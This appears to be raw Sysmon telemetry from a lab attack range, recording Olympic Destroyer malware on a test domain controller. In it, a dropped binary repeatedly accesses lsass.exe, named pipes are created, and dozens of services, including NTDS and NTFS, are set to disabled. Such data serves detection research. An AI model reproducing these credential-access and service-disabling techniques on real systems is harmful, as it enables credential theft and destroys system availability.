dll.dll+51791 10341000x8000000000000000290088Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.211{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290087Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.211{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290086Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.211{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290085Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.211{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290084Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.211{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290083Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.211{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290082Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.211{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290081Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.211{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290080Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.211{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290079Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.211{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290078Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.211{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290077Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.111{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290076Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.111{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290075Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.111{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290074Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.111{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290073Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.111{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290072Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.111{C8EA50B7-12E6-6216-4B05-000000003802}67926764C:\Temp\olympic_destroyer.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+d7f5c(wow64)|C:\Temp\olympic_destroyer.exe+b16e|C:\Temp\olympic_destroyer.exe+3474|C:\Temp\olympic_destroyer.exe+6d09|C:\Temp\olympic_destroyer.exe+792b|C:\Temp\olympic_destroyer.exe+7a71|C:\Temp\olympic_destroyer.exe+b4a4|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000290071Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.118{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe----- 123 \\.\pipe\BD323384-7437-4DCE-92B4-55D40F902E7AC:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=86D1A184850859A6A4D1C35982F3C40E,SHA256=EB766983A8A05AD16B15E356DF43F4E00F36092B8C6EFFDFF3A580C2DE2BBA8F,IMPHASH=58E5112654A5CBA84CB5B52C05309FF0{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000290070Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.111{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x8000000000000000290069Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:56:41.111{C8EA50B7-12E6-6216-4B05-000000003802}6792\BD323384-7437-4DCE-92B4-55D40F902E7AC:\Temp\olympic_destroyer.exe 11241100x8000000000000000290068Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localEXE2022-02-23 10:56:41.111{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exeC:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe2022-02-23 10:56:41.111 534500x8000000000000000290067Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.026{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe 18141800x8000000000000000290066Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:56:41.011{C8EA50B7-12E7-6216-4C05-000000003802}6340\D2D7F4DC-5091-4E5C-8CCE-9DF9AB8F1271C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe 23542300x8000000000000000217634Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:42.496{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F83E778BE0D73414F4EC8EBFDEEA7F16,SHA256=F254B105F8B6215C96E6A980E6F6EDACE460B9AF979C7C43D4CA876B895E83E4,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000290666Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.966{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\nvraid\ImagePath\SystemRoot\System32\drivers\nvraid.sys 12241200x8000000000000000290665Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.966{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\nvraid\StartOverride 13241300x8000000000000000290664Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.966{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\nvraid\StartDWORD (0x00000004) 13241300x8000000000000000290663Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.966{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Null\StartDWORD (0x00000004) 13241300x8000000000000000290662Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.965{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NTFS\StartDWORD (0x00000004) 13241300x8000000000000000290661Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.961{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NtFrs\StartDWORD (0x00000004) 13241300x8000000000000000290660Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.944{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NTDS\StartDWORD (0x00000004) 13241300x8000000000000000290659Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.944{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\nsiproxy\StartDWORD (0x00000004) 13241300x8000000000000000290658Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.944{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\nsi\StartDWORD (0x00000004) 13241300x8000000000000000290657Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.944{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npsvctrig\StartDWORD (0x00000004) 13241300x8000000000000000290656Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.944{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Npfs\StartDWORD (0x00000004) 13241300x8000000000000000290655Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.944{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\StartDWORD (0x00000004) 13241300x8000000000000000290654Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.944{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NlaSvc\StartDWORD (0x00000004) 13241300x8000000000000000290653Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.944{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\netvsc\StartDWORD (0x00000004) 10341000x8000000000000000290652Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.944{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12EA-6216-6905-000000003802}1000C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 